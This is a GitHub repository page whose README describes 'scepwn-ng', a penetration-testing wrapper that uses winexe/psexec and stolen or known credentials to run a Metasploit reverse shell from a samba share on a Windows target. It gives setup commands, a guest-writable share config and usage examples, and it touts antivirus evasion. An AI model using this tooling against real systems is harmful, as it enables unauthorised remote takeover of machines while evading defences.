Skip to content
A winexe/psexec wrapper to use sce and a msfvenom generated payload on a target system
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md
scepwn-ng.rb

README.md

scepwn-ng @thejosko jskorich@secureworks.com

INTRODUCTION

scepwn-ng is a wrapper script for launching winexe/psexec at a target, which then runs shellcode exec from a samba share with a msf generated reverse shell. As the executable never touches disk, it is highly effective at evading a/v.

INSTALL

Basic Setup for a kali box (skyfire):

		$ cd /opt
		$ git clone https://github.com/CoreSecurity/impacket.git
		$ cd impacket; python setup.py install
		$ cd /opt; git clone https://github.com/inquisb/shellcodeexec.git

If not using Kali, you will also need to install metasploit and winexe, as well as manually setup the samba share:

Add a share to your samba conf - usually located at /etc/samba/smb.conf

[sce_share]
		browseable = no
		path = /var/sce_share
		guest ok = yes
		read only = no
		create mask = 0600
		directory mask = 0700

USAGE

	./scepwn-ng.rb [optional]

Example:

	./scepwn-ng.rb -u 'Administrator%Password1' -t 10.1.1.1 -s psexec -p 4444

Note - All options are just that.. optional. If you leave anything out it will ask you for it.

Options:

	-t, --target TARGET              
																	Target IP address
	-u, --user CREDENTIALS           
																	Credentials in DOMAIN/USERNAME%PASSWORD format
	-p, --port PORT                  
																	Reverse shell port number (default: 443)
	-s, --service SERVICE            
																	winexe or psexec (default: winexe)
	-h, --help                       
																	Display this screen
You can’t perform that action at this time.